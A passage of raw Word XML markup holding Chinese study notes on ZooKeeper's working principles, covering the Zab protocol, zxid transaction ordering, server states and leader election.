        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://www.ibm.com/developerworks/cn/opensource/os-cn-zookeeper/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00172974" w:rsidRPr="00F41A4C" w:rsidRDefault="00172974" w:rsidP="00172974">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00151BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工作原理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00212C91" w:rsidRDefault="00151BA9" w:rsidP="00212C91">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ookeeper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>核心是原子广播</w:t>
      </w:r>
      <w:r w:rsidR="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，保证了</w:t>
      </w:r>
      <w:r w:rsidR="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidR="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的同步。实现这个机制的协议叫做</w:t>
      </w:r>
      <w:r w:rsidR="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Zab</w:t>
      </w:r>
      <w:r w:rsidR="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议。</w:t>
      </w:r>
      <w:r w:rsidR="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Zab</w:t>
      </w:r>
      <w:r w:rsidR="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有两种模式，它们分别是选主（恢复模式）和同步（广播模式）。当</w:t>
      </w:r>
      <w:r w:rsidR="00212C91" w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当服务启动或者在领导者崩溃后，</w:t>
      </w:r>
      <w:r w:rsidR="00212C91" w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Zab</w:t>
      </w:r>
      <w:r w:rsidR="00212C91" w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就进入了恢复模式，当领导者被选举出来，且大多数</w:t>
      </w:r>
      <w:r w:rsidR="00212C91" w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidR="00212C91" w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>完成了和</w:t>
      </w:r>
      <w:r w:rsidR="00212C91" w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="00212C91" w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的状态同步以后，恢复模式就结束了。状态同步保证了</w:t>
      </w:r>
      <w:r w:rsidR="00212C91" w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidR="00212C91" w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00212C91" w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidR="00212C91" w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具有相同的系统状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00500C23" w:rsidRPr="00863F5B" w:rsidRDefault="00500C23" w:rsidP="00212C91">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863F5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00863F5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ZooKeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="00863F5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>顺序很重要。因此它用了强制性措施来保证有序。所有的更新都是统一有序的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00863F5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ZooKeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="00863F5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>会给每个更新一个序号，称之为</w:t>
      </w:r>
      <w:r w:rsidRPr="00863F5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>zxid(ZooKeeper Transaction Id)</w:t>
      </w:r>
      <w:r w:rsidRPr="00863F5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>。每次更新的</w:t>
      </w:r>
      <w:r w:rsidRPr="00863F5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>zxid</w:t>
      </w:r>
      <w:r w:rsidRPr="00863F5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>都是唯一的。读操作是相对于写有序的。读请求的响应会被所请求的服务器标记上它（这台服务器）所处理的最后一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00863F5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>zxid</w:t>
      </w:r>
      <w:r w:rsidRPr="00863F5B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00212C91" w:rsidRPr="00212C91" w:rsidRDefault="00212C91" w:rsidP="00212C91">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了保证事务的顺序一致性，</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采用了递增的事务</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>号（</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zxid</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）来标识事务。所有的提议（</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proposal</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）都在被提出的时候加上了</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zxid</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。实现中</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zxid</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位的数字，</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>它高</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位是</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>epoch</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用来标识</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关系是否改变，每次一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被选出来，它都会有一个新的</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>epoch</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，标识当前属于那个</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的统治时期。低</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位用于递增计数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00212C91" w:rsidRPr="00212C91" w:rsidRDefault="00212C91" w:rsidP="00212C91">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每个</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在工作过程中有三种状态：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00212C91" w:rsidRPr="00212C91" w:rsidRDefault="00212C91" w:rsidP="00212C91">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LOOKING</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不知道</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是谁，正在搜寻</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00212C91" w:rsidRPr="00212C91" w:rsidRDefault="00212C91" w:rsidP="00212C91">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LEADING</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即为选举出来的</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A368BE" w:rsidRDefault="00212C91" w:rsidP="00212C91">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FOLLOWING</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>leader</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经选举出来，当前</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00212C91">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与之同步</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB437C" w:rsidRDefault="00CB437C" w:rsidP="00212C91">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB437C" w:rsidRPr="00166F65" w:rsidRDefault="00CB437C" w:rsidP="00CB437C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>选举机制</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(FastLeaderElection</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>算法</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sid</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>最大且被超过集群中超过半数的机器拥护就会成为</w:t>
      </w:r>
      <w:r w:rsidRPr="00166F65">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>leader.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB437C" w:rsidRPr="00166F65" w:rsidRDefault="00CB437C" w:rsidP="00CB437C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
